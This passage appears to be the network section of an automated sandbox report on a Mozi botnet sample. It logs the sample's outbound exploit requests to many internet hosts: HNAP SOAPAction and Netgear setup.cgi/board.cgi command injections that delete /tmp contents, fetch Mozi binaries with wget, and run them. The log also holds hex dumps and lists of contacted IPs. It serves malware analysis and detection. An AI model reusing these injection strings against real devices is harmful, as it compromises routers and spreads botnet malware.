xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 114.158.233.160:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 155.230.225.129:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.78.24.125:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 92.122.164.134:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 171.247.8.159:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 38.35.98.151:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 199.204.251.131:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: /tmp/KnAY2OIPI3 (PID: 4619)Socket: 0.0.0.0::38798
                Source: unknownTCP traffic detected without corresponding DNS query: 184.164.122.183
                Source: unknownTCP traffic detected without corresponding DNS query: 51.93.41.179
                Source: unknownTCP traffic detected without corresponding DNS query: 83.138.58.60
                Source: unknownTCP traffic detected without corresponding DNS query: 77.89.211.235
                Source: unknownTCP traffic detected without corresponding DNS query: 62.217.2.44
                Source: unknownTCP traffic detected without corresponding DNS query: 172.58.106.47
                Source: unknownTCP traffic detected without corresponding DNS query: 188.39.11.49
                Source: unknownTCP traffic detected without corresponding DNS query: 21.167.23.229
                Source: unknownTCP traffic detected without corresponding DNS query: 154.228.225.43
                Source: unknownTCP traffic detected without corresponding DNS query: 142.185.51.138
                Source: unknownTCP traffic detected without corresponding DNS query: 121.235.253.2
                Source: unknownTCP traffic detected without corresponding DNS query: 29.145.147.14
                Source: unknownTCP traffic detected without corresponding DNS query: 103.85.31.98
                Source: unknownTCP traffic detected without corresponding DNS query: 19.118.150.224
                Source: unknownTCP traffic detected without corresponding DNS query: 158.169.216.109
                Source: unknownTCP traffic detected without corresponding DNS query: 18.203.169.48
                Source: unknownTCP traffic detected without corresponding DNS query: 93.208.214.175
                Source: unknownTCP traffic detected without corresponding DNS query: 133.43.111.70
                Source: unknownTCP traffic detected without corresponding DNS query: 129.12.160.142
                Source: unknownTCP traffic detected without corresponding DNS query: 94.167.107.6
                Source: unknownTCP traffic detected without corresponding DNS query: 87.70.234.237
                Source: unknownTCP traffic detected without corresponding DNS query: 12.106.20.19
                Source: unknownTCP traffic detected without corresponding DNS query: 94.169.172.220
                Source: unknownTCP traffic detected without corresponding DNS query: 41.177.29.19
                Source: unknownTCP traffic detected without corresponding DNS query: 174.82.166.212
                Source: unknownTCP traffic detected without corresponding DNS query: 192.127.211.209
                Source: unknownTCP traffic detected without corresponding DNS query: 120.206.173.159
                Source: unknownTCP traffic detected without corresponding DNS query: 147.73.77.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.249.234.237
                Source: unknownTCP traffic detected without corresponding DNS query: 23.216.220.40
                Source: unknownTCP traffic detected without corresponding DNS query: 7.108.184.228
                Source: unknownTCP traffic detected without corresponding DNS query: 109.176.26.151
                Source: unknownTCP traffic detected without corresponding DNS query: 34.9.142.75
                Source: unknownTCP traffic detected without corresponding DNS query: 204.86.91.239
                Source: unknownTCP traffic detected without corresponding DNS query: 151.197.193.88
                Source: unknownTCP traffic detected without corresponding DNS query: 117.254.218.74
                Source: unknownTCP traffic detected without corresponding DNS query: 145.78.201.48
                Source: unknownTCP traffic detected without corresponding DNS query: 181.228.162.132
                Source: unknownTCP traffic detected without corresponding DNS query: 199.53.125.193
                Source: unknownTCP traffic detected without corresponding DNS query: 105.32.8.235
                Source: unknownTCP traffic detected without corresponding DNS query: 34.106.39.153
                Source: unknownTCP traffic detected without corresponding DNS query: 196.16.113.212
                Source: unknownTCP traffic detected without corresponding DNS query: 121.250.87.121
                Source: unknownTCP traffic detected without corresponding DNS query: 80.230.157.194
                Source: unknownTCP traffic detected without corresponding DNS query: 163.46.160.172
                Source: unknownTCP traffic detected without corresponding DNS query: 119.52.222.172
                Source: unknownTCP traffic detected without corresponding DNS query: 193.81.154.165
                Source: unknownTCP traffic detected without corresponding DNS query: 54.133.190.191
                Source: unknownTCP traffic detected without corresponding DNS query: 215.1.190.118
                Source: unknownTCP traffic detected without corresponding DNS query: 16.179.214.74
